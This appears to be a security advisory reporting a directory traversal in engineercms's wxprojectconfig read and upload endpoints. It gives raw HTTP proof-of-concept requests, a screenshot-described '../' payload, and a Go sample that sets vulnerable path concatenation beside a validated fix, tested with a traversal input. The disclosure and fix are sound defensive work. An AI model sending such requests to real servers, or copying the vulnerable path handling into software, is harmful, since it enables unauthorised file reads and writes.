Description
Summary
Version 20250429 of engineercms has a directory traversal vulnerability that allows JSON files to be uploaded to, and read from, directories outside the intended one.
Vulnerable paths:
/v1/admin/getwxprojectconfig
/v1/admin/putwxprojectconfig
Details
JSON file read PoC:
GET /v1/admin/getwxprojectconfig?projectid=25014 HTTP/1.1
Host: 10.4.9.55:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://10.4.9.55:8082/v1/admin/jsoneditor?projectid=25014
Cookie:
JSON file upload PoC (requires administrator privileges):
POST /v1/admin/putwxprojectconfig?projectid=25014 HTTP/1.1
Host: 10.4.9.55:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 2
Origin: http://10.4.9.55:8082
Connection: keep-alive
Referer: http://10.4.9.55:8082/v1/admin/jsoneditor?projectid=25014
Cookie: hotqinsessionid=798b8ad62e3c70b4490ce6d8b43bbc16
Priority: u=0
11
The locations of the affected function points are shown in the following screenshots:
(Screenshot: the request packet that reads the JSON file across directories using "../".)
(Screenshot: the request packet that saves the JSON file across directories using "../".)
Code
The handler for file upload is shown below. The input path is concatenated directly into the file path string, so a value containing "../" allows the JSON file to be written outside the intended directory.
(Screenshot: the file upload handler.)
The handler for file reading is shown below and has the same defect:
(Screenshot: the file read handler.)
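The following is an added illustration, not engineercms code, of the defect described above and of the corresponding fix: the vulnerable form concatenates the untrusted projectid straight into the path, while the safe form restricts it to a single path component and verifies that the cleaned result still lies under the config root. The directory `/srv/engineercms/wxproject`, the file name `project.config.json` and the sample inputs are constructed assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// configRoot is a constructed stand-in for the directory that holds each
// project's JSON config (assumption: not the real engineercms location).
const configRoot = "/srv/engineercms/wxproject"

// ErrTraversal is returned when a projectid would resolve outside configRoot.
var ErrTraversal = errors.New("projectid resolves outside the config directory")

// vulnerableConfigPath reproduces the defect the report describes: the
// untrusted projectid is concatenated straight into the path, so a value
// containing "../" escapes configRoot once the OS resolves it.
func vulnerableConfigPath(projectid string) string {
	return configRoot + "/" + projectid + "/project.config.json"
}

// safeConfigPath builds the same path but refuses anything that leaves
// configRoot: a project id must be a single, non-special path component, and
// the cleaned result must still sit under root (the prefix includes the
// separator so a sibling such as "wxproject-old" does not pass as inside).
func safeConfigPath(projectid string) (string, error) {
	if projectid == "" || projectid == "." || projectid == ".." ||
		strings.ContainsAny(projectid, `/\`) {
		return "", ErrTraversal
	}
	root := filepath.Clean(configRoot)
	candidate := filepath.Join(root, projectid, "project.config.json") // Join cleans
	if !strings.HasPrefix(candidate, root+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return candidate, nil
}

func main() {
	// Constructed inputs: the id from the report's PoC and a traversal attempt.
	for _, id := range []string{"25014", "../../tmp/outside"} {
		fmt.Printf("vulnerable: %s -> %s\n", id, filepath.Clean(vulnerableConfigPath(id)))
		if p, err := safeConfigPath(id); err != nil {
			fmt.Printf("safe:       %s -> rejected (%v)\n", id, err)
		} else {
			fmt.Printf("safe:       %s -> %s\n", id, p)
		}
	}
}
```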